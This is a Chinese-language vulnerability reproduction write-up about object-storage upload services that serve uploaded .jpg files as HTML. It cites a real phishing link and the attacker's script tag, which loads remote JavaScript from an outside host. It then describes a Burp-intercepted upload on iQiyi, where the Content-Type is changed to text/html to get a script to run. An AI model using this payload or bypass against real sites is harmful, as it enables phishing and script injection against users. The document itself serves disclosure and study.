OSS对象存储上传解析漏洞复现

事件背景

安全研究员在近期发现网络上频繁发生国内大型互联网厂商上传图片后解析成html、js页面，被黑产人员用作钓鱼攻击。

攻击案例

酷狗钓鱼链接：
http://userphoto.bssdl.kugou.com/70296bbe6e02223af1cfb952b2eefcb3.jpg#1519721124069

实际上攻击者上传了一个内容为<script src=//55555.gz.bcebos.com/mjk.js?111></script>的后缀为jpg的文件，当用户打开原本是图片的网址，会被浏览器渲染成js最终的展示效果，包括一些列的鼠标事件和跳转。

漏洞分析

网易对象存储中提到“文件的 MIME，定义文件的类型及网页编码，决定浏览器将以什么形式、什么编码读取文件。如果用户没有指定则根据 Key 或文件名的扩展名生成，如果没有扩展名则填默认值”

先知社区之前爆出酷狗、163存在oss对象存储的一个漏洞，然后群里一个安全圈的表哥，让我研究一下其它站，我就研究了一下爱奇艺，发现他也是存在着这个漏洞的。
 

我找到了一处上传图片的地方
用burp抓了一个包，我们来看看包体，

看了一下包后，又进行了绕过的一个思路，然后我们forward

他出现了这样的一个包，根据我们的参考文档要把image/jpeg改成text/html,修改之后我们继续

forward出现了这样一个包

没事咱们继续forward

这时候返回了一个地址，咱们用host的地址+get后方的地址

好的返回成功，成功的将我们的jpg文件解析成了html文件执行了我们的script弹框